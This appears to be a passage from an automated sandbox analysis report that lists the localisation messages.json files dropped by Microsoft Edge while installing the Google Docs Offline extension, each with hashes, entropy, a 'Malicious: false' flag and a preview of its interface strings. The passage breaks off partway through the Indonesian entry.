Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\et\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	968
Entropy (8bit):	4.633956349931516
Encrypted:	false
SSDEEP:	24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
MD5:	64204786E7A7C1ED9C241F1C59B81007
SHA1:	586528E87CD670249A44FB9C54B1796E40CDB794
SHA-256:	CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
SHA-512:	44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\eu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	838
Entropy (8bit):	4.4975520913636595
Encrypted:	false
SSDEEP:	24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
MD5:	29A1DA4ACB4C9D04F080BB101E204E93
SHA1:	2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
SHA-256:	A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
SHA-512:	B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
Malicious:	false
Preview:	{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\fa\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1305
Entropy (8bit):	4.673517697192589
Encrypted:	false
SSDEEP:	24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
MD5:	097F3BA8DE41A0AAF436C783DCFE7EF3
SHA1:	986B8CABD794E08C7AD41F0F35C93E4824AC84DF
SHA-256:	7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
SHA-512:	8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\fi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	911
Entropy (8bit):	4.6294343834070935
Encrypted:	false
SSDEEP:	12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
MD5:	B38CBD6C2C5BFAA6EE252D573A0B12A1
SHA1:	2E490D5A4942D2455C3E751F96BD9960F93C4B60
SHA-256:	2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
SHA-512:	6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\fil\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	939
Entropy (8bit):	4.451724169062555
Encrypted:	false
SSDEEP:	24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
MD5:	FCEA43D62605860FFF41BE26BAD80169
SHA1:	F25C2CE893D65666CC46EA267E3D1AA080A25F5B
SHA-256:	F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
SHA-512:	F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.622066056638277
Encrypted:	false
SSDEEP:	24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
MD5:	A58C0EEBD5DC6BB5D91DAF923BD3A2AA
SHA1:	F169870EEED333363950D0BCD5A46D712231E2AE
SHA-256:	0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
SHA-512:	B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\fr_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	972
Entropy (8bit):	4.621319511196614
Encrypted:	false
SSDEEP:	24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
MD5:	6CAC04BDCC09034981B4AB567B00C296
SHA1:	84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
SHA-256:	4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
SHA-512:	160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\gl\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	990
Entropy (8bit):	4.497202347098541
Encrypted:	false
SSDEEP:	12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
MD5:	6BAAFEE2F718BEFBC7CD58A04CCC6C92
SHA1:	CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
SHA-256:	0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
SHA-512:	3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\gu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1658
Entropy (8bit):	4.294833932445159
Encrypted:	false
SSDEEP:	24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
MD5:	BC7E1D09028B085B74CB4E04D8A90814
SHA1:	E28B2919F000B41B41209E56B7BF3A4448456CFE
SHA-256:	FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
SHA-512:	040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1672
Entropy (8bit):	4.314484457325167
Encrypted:	false
SSDEEP:	48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
MD5:	98A7FC3E2E05AFFFC1CFE4A029F47476
SHA1:	A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
SHA-256:	D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
SHA-512:	457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir5528_598070558\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
